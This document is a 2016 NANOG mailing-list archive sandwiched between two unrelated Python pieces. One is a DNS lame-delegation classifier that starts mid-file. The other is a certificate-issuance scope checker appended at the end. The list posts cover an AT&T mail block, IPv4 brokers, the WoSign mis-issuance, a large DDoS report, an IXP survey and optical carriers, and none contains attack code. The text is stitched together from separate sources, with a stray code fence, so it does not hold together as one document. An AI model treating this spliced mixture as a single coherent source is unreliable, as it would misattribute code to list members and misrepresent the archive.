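    for _ in range(qd):
        off = skip_name(msg, off) + 4  # skip QTYPE + QCLASS
    sections = []
    for count in (an, ns):
        types = []
        for _ in range(count):
            off = skip_name(msg, off)
            rtype, _cls, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
            off += 10 + rdlen
            types.append(rtype)
        sections.append(types)
    return {"qr": bool(flags & 0x8000), "aa": bool(flags & 0x0400),
            "rcode": flags & 0x000F, "answer": sections[0], "authority": sections[1]}


def classify(msg):
    """Verdict for one nameserver's reply to a non-recursive apex SOA query."""
    try:
        r = parse_response(msg)
    except (ValueError, IndexError, struct.error):
        return "unparseable"
    if not r["qr"]:
        return "unparseable"
    if r["rcode"] in (2, 5):
        return "lame: " + RCODE_NAMES[r["rcode"]]
    if r["rcode"] == 3:
        # Only a server that believes it owns an ancestor zone can deny the apex.
        return "lame: NXDOMAIN from ancestor zone"
    if r["rcode"] == 0 and r["aa"] and TYPE_SOA in r["answer"]:
        return "serves zone"
    if r["rcode"] == 0 and not r["answer"] and TYPE_NS in r["authority"]:
        return "lame: referral"
    return "unclear: " + RCODE_NAMES.get(r["rcode"], str(r["rcode"]))


def build_response(zone, rcode=0, aa=False, answer=(), authority=()):
    """Constructed sample data: a reply to 'zone IN SOA' with the given sections."""
    flags = 0x8000 | (0x0400 if aa else 0) | rcode
    msg = struct.pack("!6H", 0x1234, flags, 1, len(answer), len(authority), 0)
    msg += encode_name(zone) + struct.pack("!HH", TYPE_SOA, CLASS_IN)
    for owner, rtype, rdata in list(answer) + list(authority):
        # owner None = compression pointer back to the question name at offset 12
        name = b"\xc0\x0c" if owner is None else encode_name(owner)
        msg += name + struct.pack("!HHIH", rtype, CLASS_IN, 300, len(rdata)) + rdata
    return msg


ZONE = "example.com"
SOA_RDATA = (encode_name("ns-a.hoster.example") + encode_name("hostmaster.hoster.example")
             + struct.pack("!5I", 2016083001, 3600, 900, 604800, 300))
SAMPLES = {  # constructed replies, one per hypothetical delegated nameserver
    "ns-a.hoster.example": build_response(ZONE, aa=True, answer=[(None, TYPE_SOA, SOA_RDATA)]),
    "ns-b.hoster.example": build_response(ZONE, rcode=2),
    "ns-c.hoster.example": build_response(ZONE, rcode=5),
    "ns-d.hoster.example": build_response(
        ZONE, authority=[("com", TYPE_NS, encode_name("a.gtld-servers.net"))]),
    "ns-e.hoster.example": build_response(
        ZONE, rcode=3, aa=True, authority=[("", TYPE_SOA, SOA_RDATA)]),
}


def audit(responses):
    """Map each nameserver to its verdict."""
    return {ns: classify(msg) for ns, msg in responses.items()}


if __name__ == "__main__":
    for ns, verdict in audit(SAMPLES).items():
        print(f"{ns:22} {verdict}")
```
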
From jayfar at jayfar.com Wed Aug 31 14:41:24 2016 From: jayfar at jayfar.com (Jay Farrell) Date: Wed, 31 Aug 2016 10:41:24 -0400 Subject: Need abuse/postmaster contact for AT&T to resolve IP block In-Reply-To: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> References: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> Message-ID: Interestingly, your mail to the nanog list went to my spam folder, rather than my nanog folder (I'm using gmail or domains for my mail.) That rarely happens. On Tue, Aug 30, 2016 at 9:22 AM, Webhosting.net Admin wrote: > A few of our exchange IPs get blocked intermittently, but only by ATT. Ips > are clean, no issues, we're diligent about finding and fixing these types > of issues as it has a large impact. > > It would be very helpful to know why the IP below got blocked so we can > find and fix the problem to prevent further listing. We have a few ips in > rotation and some have no issue. It's a "blind" listing, so we only find > out about it when customers complain that they getting blocked. > > ff-ip4-mx-vip1.prodigy.net # 5.3.0 flph399 DNSBL:ATTRBL 521< 67.215.167.170 >_is_blocked.__For_ > information_see_http://att.net/blocks> #SMTP# > > Any info/help would be most helpful. > > Many thanks, > > Webhosting.net Postmaster > > > > > > > From trelane at trelane.net Wed Aug 31 14:50:44 2016 From: trelane at trelane.net (Andrew Kirch) Date: Wed, 31 Aug 2016 10:50:44 -0400 Subject: Need abuse/postmaster contact for AT&T to resolve IP block In-Reply-To: References: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> Message-ID: Gmail here, went to my Inbox. On Wed, Aug 31, 2016 at 10:41 AM, Jay Farrell via NANOG wrote: > Interestingly, your mail to the nanog list went to my spam folder, rather > than my nanog folder (I'm using gmail or domains for my mail.) That rarely > happens.
> > On Tue, Aug 30, 2016 at 9:22 AM, Webhosting.net Admin < > admin at webhosting.net> > wrote: > > > A few of our exchange IPs get blocked intermittently, but only by ATT. > Ips > > are clean, no issues, we're diligent about finding and fixing these types > > of issues as it has a large impact. > > > > It would be very helpful to know why the IP below got blocked so we can > > find and fix the problem to prevent further listing. We have a few ips in > > rotation and some have no issue. It's a "blind" listing, so we only find > > out about it when customers complain that they getting blocked. > > > > ff-ip4-mx-vip1.prodigy.net # > 5.3.0 flph399 DNSBL:ATTRBL 521< 67.215.167.170 >_is_blocked.__For_ > > information_see_http://att.net/blocks> #SMTP# > > > > Any info/help would be most helpful. > > > > Many thanks, > > > > Webhosting.net Postmaster > > > > > > > > > > > > > > > From marco at paesani.it Wed Aug 31 15:23:33 2016 From: marco at paesani.it (Marco Paesani) Date: Wed, 31 Aug 2016 17:23:33 +0200 Subject: IPv4 Broker In-Reply-To: References: Message-ID: Hi Lorenzo, you can see: https://www.ripe.net/manage-ips-and-asns/resource-transfers-and-mergers/ transfers/brokers Ciao, Marco Paesani Skype: mpaesani Mobile: +39 348 6019349 Success depends on the right choice ! Email: marco at paesani.it 2016-08-30 17:43 GMT+02:00 Lorenzo Mainardi < lorenzo.mainardi at digitelitalia.com>: > Do you know any good IPv4 broker? > I need a /20. > Regards > > > > From aaron at heyaaron.com Wed Aug 31 16:12:42 2016 From: aaron at heyaaron.com (Aaron C. de Bruyn) Date: Wed, 31 Aug 2016 09:12:42 -0700 Subject: Need abuse/postmaster contact for AT&T to resolve IP block In-Reply-To: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> References: <0CA97089-F458-4AD2-9910-5E12474852B0@webhosting.net> Message-ID: Try posting that to the mailop list. I had been having trouble with att.net for about a month, and I filled out the form at http://att.net/blocks/ 3 times with no response.
I posted to mailop a few days ago and they resolved the issue within an hour. ...then a few days later I received the response to the form that my IP had already been unblocked. Even though they say they will get back to you within 2-3 days, it's more like 10-14. -A On Tue, Aug 30, 2016 at 6:22 AM, Webhosting.net Admin wrote: > A few of our exchange IPs get blocked intermittently, but only by ATT. Ips > are clean, no issues, we're diligent about finding and fixing these types > of issues as it has a large impact. > > It would be very helpful to know why the IP below got blocked so we can > find and fix the problem to prevent further listing. We have a few ips in > rotation and some have no issue. It's a "blind" listing, so we only find > out about it when customers complain that they getting blocked. > > ff-ip4-mx-vip1.prodigy.net # 5.3.0 flph399 DNSBL:ATTRBL 521< 67.215.167.170 >_is_blocked.__For_ > information_see_http://att.net/blocks> #SMTP# > > Any info/help would be most helpful. > > Many thanks, > > Webhosting.net Postmaster > > > > > > > From royce at techsolvency.com Wed Aug 31 18:45:48 2016 From: royce at techsolvency.com (Royce Williams) Date: Wed, 31 Aug 2016 10:45:48 -0800 Subject: Chinese root CA issues rogue/fake certificates In-Reply-To: References: Message-ID: On Tue, Aug 30, 2016 at 9:11 PM, Royce Williams wrote: > On Tue, Aug 30, 2016 at 8:38 PM, Eric Kuhnke wrote: >> >> http://www.percya.com/2016/08/chinese-ca-wosign-faces-revocation.html >> >> One of the largest Chinese root certificate authority WoSign issued many >> fake certificates due to an vulnerability. WoSign's free certificate >> service allowed its users to get a certificate for the base domain if they >> were able to prove control of a subdomain. This means that if you can >> control a subdomain of a major website, say percy.github.io, you're able to >> obtain a certificate by WoSign for github.io, taking control over the >> entire domain.
>
>
> And there is now strong circumstantial evidence that WoSign now owns -
> or at least, directly controls - StartCom:
>
> https://www.letsphish.org/?part=about
>
> There are mixed signals of incompetence and deliberate action here.

Hypothetically, it would be an interesting strategy for a CA to publicly demonstrate this level of competence:

https://www.schrauger.com/the-story-of-how-wosign-gave-me-an-ssl-certificate-for-github-com

... while at the same time taking over another large install base like StartSSL's (an install base fueled by offering free certs).

If one got caught doing something naughty, one could buy time by A) playing the incompetence card a few times, and B) having a large enough deployment that it becomes non-trivial for the browsers/OSes to revoke you outright.

I'm oversimplifying, as I do not yet actually grok the WoSign <-> StartCom cert trust relationship - but the individual components are ... interesting.

Also, this is a cautionary tale about certificate diversity. Because of relative issuer stability, orgs have had the luxury of depending wholly on a single cert supplier. The risk/continuity folks might want to model some "one of our major certificate issuers just got globally revoked" scenarios - if they haven't already.

(Side note: compromises in the global trust ecosystem play a fascinating part in Vinge's 2007 Hugo-winning "Rainbows End" - a great read).

Royce

From infinityape at gmail.com Wed Aug 31 19:37:12 2016
From: infinityape at gmail.com (Dennis B)
Date: Wed, 31 Aug 2016 15:37:12 -0400
Subject: Arbor Reports 540Gbps "Sustained" Attack
Message-ID:

https://www.arbornetworks.com/blog/asert/rio-olympics-take-gold-540gbsec-sustained-ddos-attacks/

I've used SP Peakflow before and I have my opinions.

With all the intelligence out there about DDoS attacks, DDoS attackers, DDoS tools and techniques this article leaves me with tons of questions.

IE:
What industry was the attack target?
Was it a single customer or multiple customers at the same time?
What was the attack vector?
Was it multi-vector?
What was the duration of the 540Gbps attack?
Did you actually block the attack or did you just report on it from your cloud signaling alliance aka cloud offering?
Could you help explain if the peak of the attack lasted X minutes, Y hours, Z days?
What was the attack targeted protocol? Was it TCP against TCP or UDP against UDP or UDP against TCP?

I have to be honest, IDK if Arbor is attempting to claim the largest recorded DDoS attack in the world cup of DDoS attacks but the fact that you're a local appliance shop. Selling to the global 100 and T1-3 ISPs - I'd hope for more than a marketing ploy to take the top attack vector.

Thought I'd ask Nanog if they heard any whispers about this "white buffalo", which ISPs were Transiting the event, what course of actions were taken.

Thanks!

From hannigan at gmail.com Wed Aug 31 21:26:58 2016
From: hannigan at gmail.com (Martin Hannigan)
Date: Wed, 31 Aug 2016 17:26:58 -0400
Subject: IPv4 Broker
In-Reply-To:
References:
Message-ID:

Hi Lorenzo,

You can obtain a last /22 from the RIPE region as long as you comply
with their policy, yes, even if you are "in" the United States.

http://bit.ly/RIPE22-20160831

That reduces your need and spend, unless you already received it.

Then use the link Marco posted. It's a good list.

And reference the archives as Cameron noted.

Best Regards,

-M<

On Tue, Aug 30, 2016 at 11:43 AM, Lorenzo Mainardi wrote:
> Do you know any good IPv4 broker?
> I need a /20.
> Regards

From duga95 at gmail.com Wed Aug 31 21:37:21 2016
From: duga95 at gmail.com (Julien)
Date: Wed, 31 Aug 2016 16:37:21 -0500
Subject: IPv4 Broker
In-Reply-To:
References:
Message-ID:

Hi,

Just worked with couple of those in the RIPE list.
Giving you the name off list might be better.

If you don't have yet anything from RIPE or APNIC, you can get a /22.
You'll have, at least, to subscribe as an LIR and pay the fees.
It will be much less expensive than buying with a broker.
You'll still have the Geo Localisation issue if you want to use it in US.

Julien.

> On Aug 31, 2016, at 4:26 PM, Martin Hannigan wrote:
>
> Hi Lorenzo,
>
> You can obtain a last /22 from the RIPE region as long as you comply
> with their policy, yes, even if you are "in" the United States.
>
> http://bit.ly/RIPE22-20160831
>
> That reduces your need and spend, unless you already received it.
>
> Then use the link Marco posted. It's a good list.
>
> And reference the archives as Cameron noted.
>
> Best Regards,
>
> -M<
>
> On Tue, Aug 30, 2016 at 11:43 AM, Lorenzo Mainardi wrote:
>> Do you know any good IPv4 broker?
>> I need a /20.
>> Regards

From duga95 at gmail.com Wed Aug 31 21:46:38 2016
From: duga95 at gmail.com (Julien)
Date: Wed, 31 Aug 2016 16:46:38 -0500
Subject: IPv4 Broker
In-Reply-To:
References:
Message-ID: <26D0E6B0-5A17-47E2-AFAB-544E3983334A@gmail.com>

Between these two regions it should be possible.
For sure, you can't with a RIPE block as it's not allowed to transfer from / to RIPE.

Julien.

> On Aug 31, 2016, at 4:43 PM, Tyler Conrad wrote:
>
> Is there a way to fix the geolocation on a JPNIC netblock being advertised in the US market short of transferring the ownership of the record to an ARIN ASN?
>
> On Wed, Aug 31, 2016 at 2:37 PM, Julien wrote:
> Hi,
>
> Just worked with couple of those in the RIPE list.
> Giving you the name off list might be better.
>
> If you don't have yet anything from RIPE or APNIC, you can get a /22.
> You'll have, at least, to subscribe as an LIR and pay the fees.
> It will be much less expensive than buying with a broker.
> You'll still have the Geo Localisation issue if you want to use it in US.
>
> Julien.
>
> > On Aug 31, 2016, at 4:26 PM, Martin Hannigan wrote:
> >
> > Hi Lorenzo,
> >
> > You can obtain a last /22 from the RIPE region as long as you comply
> > with their policy, yes, even if you are "in" the United States.
> >
> > http://bit.ly/RIPE22-20160831
> >
> > That reduces your need and spend, unless you already received it.
> >
> > Then use the link Marco posted. It's a good list.
> >
> > And reference the archives as Cameron noted.
> >
> > Best Regards,
> >
> > -M<
> >
> > On Tue, Aug 30, 2016 at 11:43 AM, Lorenzo Mainardi wrote:
> >> Do you know any good IPv4 broker?
> >> I need a /20.
> >> Regards

From tyler at tgconrad.com Wed Aug 31 21:43:35 2016
From: tyler at tgconrad.com (Tyler Conrad)
Date: Wed, 31 Aug 2016 14:43:35 -0700
Subject: IPv4 Broker
In-Reply-To:
References:
Message-ID:

Is there a way to fix the geolocation on a JPNIC netblock being advertised in the US market short of transferring the ownership of the record to an ARIN ASN?

On Wed, Aug 31, 2016 at 2:37 PM, Julien wrote:
> Hi,
>
> Just worked with couple of those in the RIPE list.
> Giving you the name off list might be better.
>
> If you don't have yet anything from RIPE or APNIC, you can get a /22.
> You'll have, at least, to subscribe as an LIR and pay the fees.
> It will be much less expensive than buying with a broker.
> You'll still have the Geo Localisation issue if you want to use it in US.
>
> Julien.
>
> > On Aug 31, 2016, at 4:26 PM, Martin Hannigan wrote:
> >
> > Hi Lorenzo,
> >
> > You can obtain a last /22 from the RIPE region as long as you comply
> > with their policy, yes, even if you are "in" the United States.
> >
> > http://bit.ly/RIPE22-20160831
> >
> > That reduces your need and spend, unless you already received it.
> >
> > Then use the link Marco posted. It's a good list.
> >
> > And reference the archives as Cameron noted.
> >
> > Best Regards,
> >
> > -M<
> >
> > On Tue, Aug 30, 2016 at 11:43 AM, Lorenzo Mainardi wrote:
> >> Do you know any good IPv4 broker?
> >> I need a /20.
> >> Regards

From mar.chiesa at gmail.com Wed Aug 31 21:25:40 2016
From: mar.chiesa at gmail.com (Marco Chiesa)
Date: Wed, 31 Aug 2016 23:25:40 +0200
Subject: routing at IXPs privacy survey
Message-ID:

Hi all,

as part of our academic effort to devise more powerful routing services at Internet eXchange Points (IXPs), we aim to understand the privacy considerations of network operators in the context of peering with other networks, in general, and at IXPs in particular.

We created a short survey for gathering some real-world operational information and we need help from you - network operators - to fill it. The survey will take less than 5 minutes.

Link to the survey: http://goo.gl/1e7cDG

The survey is fully anonymized (unless you explicitly choose to reveal your identity) and the resulting data analysis will only be presented via aggregate statistics and in an anonymized format.

We look forward to receiving your responses!

You can find more information, including a short paper about our current research work, on our website: http://six-pack.bitbucket.org/

Thanks for your help,
Marco Chiesa (UC Louvain), Marco Canini (UC Louvain), Daniel Demmler (TU Darmstadt), Michael Schapira (Hebrew University of Jerusalem) & Thomas Schneider (TU Darmstadt)

From tim at 29lagrange.com Wed Aug 31 23:08:04 2016
From: tim at 29lagrange.com (tim at 29lagrange.com)
Date: Wed, 31 Aug 2016 19:08:04 -0400
Subject: Optical Wave Providers
Message-ID:

I have been looking at optical wave carriers for some long haul 1G/10G across the US. All to major cities and well known POP's. I am finding that there are not a lot of carriers who are offering wave services, usually just ethernet/MPLS. Particularly across the North west.

Can someone shed some light on who some of the bigger carriers are and any challenges you have encountered with services like this? Who actually owns the fiber across the US?

Thanks
Tim
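The validation flaw quoted in the "Chinese root CA issues rogue/fake certificates" message above (control of a subdomain accepted as control of the base domain) comes down to a missing scope check at issuance time. The sketch below is an added example, not code from WoSign, any CA, or any poster in this archive; the function names and the three-entry suffix set are assumptions constructed for illustration.

```python
"""Issuance-scope check: proven control of a name never authorizes its parent."""

# Constructed stand-in for the Public Suffix List; a real check would load the full list.
SAMPLE_PUBLIC_SUFFIXES = {"com", "io", "github.io"}


def normalize(name: str) -> str:
    """Lower-case, drop one trailing dot, and reject malformed names."""
    name = name.strip().lower()
    if name.endswith("."):
        name = name[:-1]
    labels = name.split(".")
    if len(labels) < 2 or any(label == "" for label in labels):
        raise ValueError(f"malformed DNS name: {name!r}")
    if "*" in name and (labels[0] != "*" or "*" in ".".join(labels[1:])):
        raise ValueError(f"wildcard only allowed as the left-most label: {name!r}")
    return name


def covers(validated: str, requested: str) -> bool:
    """True if proven control of `validated` extends to `requested`.

    Authorization flows downward only: the validated name itself and names
    beneath it. The label-boundary test stops 'evilgithub.io' matching 'github.io'.
    """
    validated, requested = normalize(validated), normalize(requested)
    if "*" in validated:
        return False  # control is proven for concrete names, not wildcards
    base = requested[2:] if requested.startswith("*.") else requested
    return base == validated or base.endswith("." + validated)


def review_request(requested_names, validated_names, suffixes=SAMPLE_PUBLIC_SUFFIXES):
    """Return {requested_name: reason} for every name that must be refused."""
    refused = {}
    for name in requested_names:
        base = normalize(name)
        base = base[2:] if base.startswith("*.") else base
        if base in suffixes:
            refused[name] = "public suffix: shared by unrelated registrants"
        elif not any(covers(v, name) for v in validated_names):
            refused[name] = "no validated name at or above this one"
    return refused
```
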